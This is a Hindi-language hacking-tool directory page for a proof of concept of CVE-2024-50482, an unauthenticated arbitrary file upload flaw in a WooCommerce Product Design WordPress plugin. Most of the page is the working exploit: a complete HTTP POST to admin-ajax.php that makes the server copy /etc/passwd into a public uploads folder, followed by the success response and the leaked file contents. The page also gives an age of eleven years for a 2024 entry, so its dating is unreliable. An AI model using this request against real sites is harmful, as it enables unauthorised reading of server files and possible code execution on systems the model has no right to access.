Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-50482 — Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Upload | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-50482
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-50482

CVE-2024-50482

Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Upload

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-50482

Woocommerce Product Design <= 1.0.0 - प्रमाणीकरण रहित मनमानी फ़ाइल अपलोड

विवरण:

WordPress के लिए Woocommerce Product Design प्लगइन, 1.0.0 तक (और इसमें शामिल) सभी संस्करणों में फ़ाइल प्रकार सत्यापन की कमी के कारण मनमानी फ़ाइल अपलोड करने की सुविधा प्रदान करता है। इससे बिना प्रमाणीकरण के हमलावर प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें अपलोड कर सकते हैं, जो दूरस्थ कोड निष्पादन को संभव बना सकता है।

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50482
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: woo-product-design

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Origin: http://kubernetes.docker.internal
Connection: keep-alive

action=pc_added_uploaded_image&file[path]=/etc/passwd

प्रतिक्रिया

root@kitploit:~
{
  "message" : "Image Uploaded Successfully",
  "url" : "http://kubernetes.docker.internal/wp-content/uploads/wcpc/images/uploaded_images/passwd",
  "path" : "/var/www/html/wp-content/uploads/wcpc/images/uploaded_images/passwd",
  "status" : "success"
}

उदाहरण परिणाम

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
टूल डाउनलोड करें